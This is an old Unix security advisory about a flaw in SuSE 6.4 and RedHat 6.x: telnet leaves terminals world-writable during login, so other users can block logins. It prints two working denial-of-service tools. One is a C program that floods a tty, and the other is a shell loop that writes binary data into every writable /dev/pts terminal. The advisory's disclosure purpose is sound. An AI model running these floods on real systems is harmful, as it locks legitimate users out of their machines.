Vulnerability

    tty

Affected

    SuSE linux 6.4, RedHat 6.x

Description

    Following is based on a Securax Advisory 13.  When someone telnets
    to a UNIX  system, the tty  that will be  assigned to him  will be
    writable for any user on the  system.  However, when he is  logged
    in, his tty  will not be  writable for all  users.  So  if someone
    would write data to a tty that is currently used by someone  who's
    logging in, that person won't be able to log in.

    The impact can be pretty severe,  allowing no one to log in.   The
    proof of concept code created  will demonstrate this, but only  on
    1 given tty.  This was done for 2 basic reasons; 1 so the  kiddies
    can't  play  to  much  with  this  code  and seconde that this was
    written in less than 5 minutes (there was a lack of time).

    /*
     * ttwrite.c
     * ---------
     *
     * written by ROOT-dude
     *
     * ok, this code is pretty shitty, but it works
     * so far it's only set to flood tty4, but with a
     * little modification, you can flood all tty's.
     * I made this limitation so the kiddies can't
     * play to much !!!  (THIS IS ONLY PROOF OF
     * CONCEPT CODE !!!!)
     *
     * I found this bug when I was messing around
     * with this tool I found, called m0000h.sh
     * which did the same but for /dev/pts,
     * (that still isn't fixed btw) only "prob" is
     * pts is for pseudo terminals, so a normal
     * remote telnet connection will get a tty assinged
     * and not a pts !!!!
     *
     * greetZ to :: incubus, f0bic, F_F, nostalgic,
     * t-omicron, zym0t1c, tosh, vorlon, cicero,
     * zoa, demongirl, so many others i forgot ...
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    #define string "aaaaaaaaaa"

    main()
    {
     int fd;
     char tty[25];

     bzero(tty, sizeof(tty));
     strcat(tty, "/dev/tty4"); /* change to tty you want */
     fd = open(tty, O_WRONLY);
     while(fd < 0)
     {
      fd = open(tty, O_WRONLY);
     }

     while(fd)
     {
     write(fd, string, sizeof(string));
     }

     close(fd); /* no need to close it, but we'll code it anyway !*/

    }

    teleh0r wrote a shell script  which would flood the terminal  of a
    user  trying  to  log  in  a  long  time  ago  and  someone called
    c0sa_n0stra.  After that, this code was called m000h.sh.

    The problem is the way that  the telnet daemon assigns a new  user
    a terminal -  when a user  is telling the  telnetd who he  is, and
    what his password is, his  terminal will be awaiting in  /dev/pts/
    and writable by anyone.  As soon as he has logged in, it will not.

    It is still possible for him to log in though, even if a binary is
    cat'ed to  the terminal  (but as  said by  Fyodor, it  may mess-up
    his terminal).

    sshd/rshd/rlogind  do  not  behave  this  way  -  there will be no
    writable terminal in /dev/pts/ while the authentication is  taking
    place.

    The below script has been tested on Redhat 6.1 and 6.2.

    #!/bin/sh

    TTYDIR=/dev/pts
    NONSENSE=/bin/nice
    MYTTY=`tty` # To prevent flooding of one's own TTY

    while :; do
        for i in $TTYDIR/* ; do
            if [ -w $i -a -c $i -a $i != $MYTTY ]; then
                cat $NONSENSE > $i
            fi
        done
    done

    unset i

Solution

    At least AIX 4.3.3 seems to set the /dev/pts/? to:

        c---------   1 root     system    28,  3 Jan 03 23:06 3

    during telnet auth.